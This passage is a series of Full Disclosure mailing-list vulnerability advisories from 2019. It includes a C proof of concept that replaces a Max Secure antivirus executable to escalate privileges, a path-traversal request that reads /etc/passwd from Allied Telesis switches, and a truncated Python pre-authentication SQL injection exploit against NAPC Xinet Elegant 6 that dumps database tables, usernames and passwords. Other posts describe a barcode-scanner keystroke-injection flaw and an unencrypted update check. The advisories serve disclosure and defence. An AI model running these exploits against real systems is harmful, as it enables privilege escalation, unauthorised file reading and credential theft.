[FD] Max Secure Anti Virus Plus - 19.0.4.020 / CVE-2019-19382 Insecure Permissions
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt [+] ISR: ApparitionSec [Vendor]www.maxpcsecure.com [Affected Product Code Base] Max Secure Anti Virus Plus - 19.0.4.020 File hash: ab1dda23ad3955eb18fdb75f3cbc308a msplusx64.exe [Vulnerability Type] Insecure Permissions [CVE Reference] CVE-2019-19382 [Security Issue] Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory. Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation. C:\Program Files\Max Secure Anti Virus Plus>cacls * | more C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F [Affected Component] Permissions on installation directory [Exploit/POC] #include #include #define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe" #define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe" #define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp" /* Max Secure Anti Virus Plus PoC By hyp3rlinx */ BOOL PWNED=FALSE; BOOL FileExists(LPCTSTR szPath){ DWORD dwAttrib = GetFileAttributes(szPath); return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); } void main(void){ if(!FileExists(DISABLED_TARGET)){ CopyFile(TARGET, TMP, FALSE); Sleep(1000); CopyFile(TMP, DISABLED_TARGET, FALSE); printf("[+] Max Secure Anti Virus Plus EoP PoC\n"); Sleep(1000); printf("[+] Disabled MaxSDUI.exe ...\n"); Sleep(300); }else{ PWNED=TRUE; } if(!PWNED){ char fname[MAX_PATH]; char newLoc[]=TARGET; DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); if (size){ printf("[+] Copying exploit to vuln dir...\n"); Sleep(1000); CopyFile(fname, TARGET, FALSE); printf("[+] Replaced legit Max Secure EXE...\n"); Sleep(2000); printf("[+] Done!\n"); MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk"); Sleep(1000); exit(0); } }else{ if(FileExists(TMP)){ remove(TMP); } printf("[+] Max Secure Anti Virus Plus PWNED!!!\n"); printf("[+] hyp3rlinx\n"); system("pause"); } } [POC Video URL]https://www.youtube.com/watch?v=DXSV5geXkTw [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: November 19, 2019 Vendor: "received a reply they will fix soon" Status request: November 24, 2019 No replies other than automated response. November 29, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Anhui Huami Mi Fit Android Application - Unencrypted Update Check
What's the issue here exactly? An attacker can just prevent an the in app update check from realizing it needs to nag the user? The actual update logic and update-ability is controlled through the Play Store, no? -Tim Strazzere On Tue, Nov 26, 2019 at 10:27 AM David Coomber < davidcoomber.info...@gmail.com> wrote: > Anhui Huami Mi Fit Android Application - Unencrypted Update Check > -- > https://www.info-sec.ca/advisories/Huami-Mi-Fit.html > > Overview > > "Mi Fit tracks your activity, analyzes sleep, and evaluates your workouts." > > (https://play.google.com/store/apps/details?id=com.xiaomi.hm.health) > > Issue > > The Anhui Huami Mi Fit Android application (version 4.0.10 and below), > does not encrypt the connection when it checks for an update. > > Impact > > An attacker who can monitor network traffic may be able to tamper with > the application's update function. > > Timeline > > October 21, 2019 - Attempted to obtain a security contact via an email > to supp...@amazfit.com > October 22, 2019 - Provided the details to CERT/CC > October 23, 2019 - CERT/CC opened a case for tracking > November 4, 2019 - Attempted to obtain a security contact via an email > to secur...@xiaomi.com > > Solution > > Upgrade to version 4.0.11 or later > > ___ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2019-18922; Directory Traversal; Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 = CVEID: CVE-2019-18922 NAME OF AFFECTED PRODUCT: Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047] PROBLEM TYPE: Directory Traversal DESCRIPTION: A Directory Traversal in the Web interface of the Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047] allows unauthenticated attackers to read arbitrary system files via a GET request. NOTE: This is an End-of-Life product. = I. VULNERABILITY - - The Allied Telesis AT-GS950/8 Network Switch with Firmware until AT-S107 V.1.1.3 [1.00.047] is confirmed to have an Directory Traversal Vulnerability. II. BACKGROUND - - The AT-S107 Firmware is used for Configuration through an Web-Interface. III. DESCRIPTION - - A GET-Request with the Path http://[IP]/../../../../../../etc/passwd shows the File-Content. V. BUSINESS IMPACT - - A Attacker can read arbitrary System-Files. VI. SYSTEMS AFFECTED - - Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047]. VII. CREDITS - - The Vulnerability has been discovered by the Security-Team at the University Bayreuth. [N. H. Sprenger, Dr. H. Benda]. VIII. LEGAL NOTICES - - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. = -BEGIN PGP SIGNATURE- iQEzBAEBCAAdFiEEJliv/QRedf6UzVmWtNym7A91fYQFAl3ftoYACgkQtNym7A91 fYQvcwgAqSC6BU4EFbZvSX/mFecjeEIwphIgEp3n1QPb2gwwJHA3DGYdWNzp05YD ZytxPofVoH+bWxZWun7vMi0c4HhZHPM3CJaJmcMoahSI2FEFfytQYbhcN/oWLCl+ ahc1J062wj2lnwh7gmLrdUX0RD2oM0VVnaU4gNAYMykVGTuQVVjTi2YwHFysaz1T zEJQXOHxrdUC4BPgaYdimpmJts4M6IxCghYRWsMOTObKFlmfMVMQpsc+OgKF34U2 aWRJQq05AE4FYYYHg81pFVcjVWRQ8ZOObEl4OgwTCY+vWwMS0BK4MZXMQkvB0y8t b6hbNAeasEaQ4g3SrzTe5273F7HF9g== =ZqDR -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [SYSS-2019-027]: Inateck BCST-60 Barcode Scanner - Keystroke Injection Vulnerability (CVE-2019-12503)
Advisory ID: SYSS-2019-027 Product: BCST-60 Barcode Scanner Manufacturer: Inateck Affected Version(s): BCST-60 Tested Version(s): BCST-60 Vulnerability Type: Cryptographic Issues (CWE-310) Keystroke Injection Vulnerability Risk Level: High Solution Status: Open Manufacturer Notification: 2019-05-22 Solution Date: - Public Disclosure: 2019-11-28 CVE Reference: CVE-2019-12503 Author of Advisory: Matthias Deeg (SySS GmbH) Overview: Inateck BCST-60 is a barcode scanner that can be either used wirelessly using 2.4 GHz radio communication or wired via USB. The manufacturer describes the product as follows [1]: "With a 2.4G wireless connection, avoid the troubles of Bluetooth pairing. Inateck BCST-60 is a leading product among scanners in the field of large transmission ranges and battery endurance. What's more, it can read barcodes at extreme angles. Whether you need barcode scanning at your retail POS, at a hospital patient's bedside, on the manufacturing production line or your warehouse, the Inateck BCST-60 will be a great fit for your specific needs." Due to an insecure implementation of the data communication, the wireless barcode scanner Inateck BCST-60 is vulnerable to keystroke injection attacks. Vulnerability Details: SySS GmbH found out that the wireless barcode scanner Inateck BCST-60 is vulnerable to keystroke injection attacks. An attacker can analyze the unencrypted and unauthenticated data packets of the 2.4 GHz radio communication sent by the wireless barcode scanner to the receiver (USB dongle) in order to learn the used protocol. By knowing the used data protocol, it is possible to send packets to the USB dongle (receiver) of a target system, containing attacker-controlled keystrokes or keystroke sequences. Proof of Concept (PoC): SySS GmbH could successfully perform keystroke injection attacks against the wireless barcode scanner Inateck BCST-60 using a developed proof-of-concept software tool in combination with the USB radio dongle Crazyradio PA and the nrf-research-firmware by Marc Newlin [2, 3]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2019-05-22: Vulnerability reported to manufacturer 2019-11-28: Public release of security advisory References: [1] Product website for Inateck BCST-60 barcode scanner https://www.inateck.com/bcst-60-2-4ghz-wireless-barcode-scanner-with-35m-range.html [2] Product website for Crazyradio PA https://www.bitcraze.io/crazyradio-pa/ [3] nRF24 research firmware and tools by Marc Newlin https://github.com/marcnewlin/presentation-clickers [4] SySS Security Advisory SYSS-2019-027 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-027.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en signature.asc Description: OpenPGP digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 / Pre-Auth SQL Injection 0Day
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.napc.com [Product] Xinet Elegant 6 Asset Library Web Interface v6.1.655 Web based interface for xinet asset management solution. [Vulnerability Type] Pre-Auth SQL Injection [CVE Reference] CVE-2019-19245 [Security Issue] NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows Pre-Authentication Error based SQL Injection via the /elegant6/login LoginForm[username] field when double quotes are used. The vulnerable version seems to be old, but it may still be possible to still find it deployed as I have. Vulnerable Parameter: LoginForm[username] (POST) Method. [Exploit/POC] import requests,time,re,sys,argparse #NAPC Xinet Elegant 6 Asset Library v6.1.655 #Pre-Auth SQL Injection 0day Exploit #By hyp3rlinx #ApparitionSec #== #This will dump tables, usernames and passwords in vulnerable versions #REQUIRE PARAMS: LoginForm[password]=[rememberMe]=0[username]=SQL #SQL INJECTION VULN PARAM --> LoginForm[username] # IP="" PORT="80" URL="" NUM_INJECTS=20 k=1 j=0 TABLES=False CREDS=False SHOW_SQL_ERROR=False def vuln_ver_chk(): global IP, PORT TARGET = "http://"+IP+":"+PORT+"/elegant6/login; response = requests.get(TARGET) if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content): print "[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655." return True print "[!] Version not vulnerable :(" return False def sql_inject_request(SQL): global IP, PORT URL = "http://"+IP+":"+PORT+"/elegant6/login; tmp="" headers = {'User-Agent': 'Mozilla/5.0'} payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL} session = requests.Session() res = session.post(URL,headers=headers,data=payload) idx = res.content.find('CDbCommand') # Start of SQL Injection Error in response idx2 = res.content.find('key 1') # End of SQL Injection Error in response return res.content[idx : idx2+3] #Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc def inc(): global k,j while j < NUM_INJECTS: j+=1 if k !=1: k+=1 return str(j)+','+str(k) def tidy_up(results): global CREDS idx = results.find("'") if idx != -1: idx2 = results.rfind("'") if not CREDS: return results[idx + 1: idx2 -2] else: return results[idx + 2: idx2] def breach(i): global k,j,NUM_INJECTS,SHOW_SQL_ERROR result="" #Dump Usernames & Passwords if CREDS: if i % 2 == 0: target='username' else: target='password' SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))' 'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -') if not SHOW_SQL_ERROR: result = tidy_up(sql_inject_request(SQL)) else: result = sql_inject_request(SQL)+"\n" print "[+] Dumping "+target+": "+result #Dump Tables if TABLES: while j < NUM_INJECTS: nums = inc() SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()' 'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -') if not SHOW_SQL_ERROR: result = tidy_up(sql_inject_request(SQL)) else: result = sql_inject_request(SQL) + "\n" print "[+] Dumping Table... " +result time.sleep(0.3) def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-i", "--ip_address", help=".") parser.add_argument("-p", "--port", help="Port, Default is 80") parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.") parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.") parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.") parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.") parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.") return parser.parse_args() def usage(): print "Dump first ten rows of usernames and passwords" print "NAPC-Elegant-6-SQL-Exploit.py -i -c -m 10\n" print "\nDump first five rows of database tables and show SQL errors" print "NAPC-Elegant-6-SQL-Exploit.py -i -t -m 5 -s\n" exit(0) def main(args): global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR if args.ip_address: